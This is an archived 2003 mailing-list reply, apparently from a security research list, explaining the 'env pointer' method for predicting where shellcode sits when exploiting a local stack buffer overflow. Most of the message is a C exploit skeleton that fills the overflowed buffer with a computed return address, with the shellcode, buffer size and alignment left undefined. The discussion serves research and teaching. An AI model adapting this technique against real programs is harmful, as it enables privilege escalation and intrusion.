On Mon, 24 Mar 2003 steveat_private wrote:

> That wasn't the part that I was considering as being novel.
>
> When I've coded things before I've spent most of my time determining
> where the return address lies within the area I've overflowed. (By
> doing a binary search of my 'XXXXXX's).
>
> I was thinking that by knowing the address of the buffer in the
> process's memory space this would reduce the number of trials down
> to four. (To deal with alignment issues).

If you are exploiting a local vulnerability you can also use the even
simpler env pointer technique to locate the shellcode.

    #include <string.h>
    #include <unistd.h>

    /* sc (the shellcode string), BUF (size of the overflowing buffer) and
     * ALIGN (byte offset to word-align the return address slots) are
     * target-specific and are not defined in the original post. */

    int main()
    {
        char *env[2] = {sc, NULL};      /* shellcode is the only env string */
        char buf[BUF];
        int i;
        int *ap = (int *)(buf + ALIGN);

        /* top of stack (0xbffffffa) minus the env string and the program
         * path string placed there by the kernel on exec */
        int ret = 0xbffffffa - strlen(sc) - strlen("./vuln-program");

        /* fill the buffer with the computed address */
        for (i = 0; i < BUF - 1; i += 4)
            *ap++ = ret;
        *ap = 0x0;

        execle("./vuln-program", "vuln-program", buf, NULL, env);
        return 0;
    }

As you can see, for ./vuln-program the shellcode will always be at:

    0xbffffffa - strlen(sc) - strlen("./vuln-program")

Cheers,

:raptor

Antifork Research, Inc.   0xdeadbeef | raptor's labs
http://www.antifork.org   http://www.0xdeadbeef.info
This archive was generated by hypermail 2b30 : Mon Mar 24 2003 - 20:38:21 PST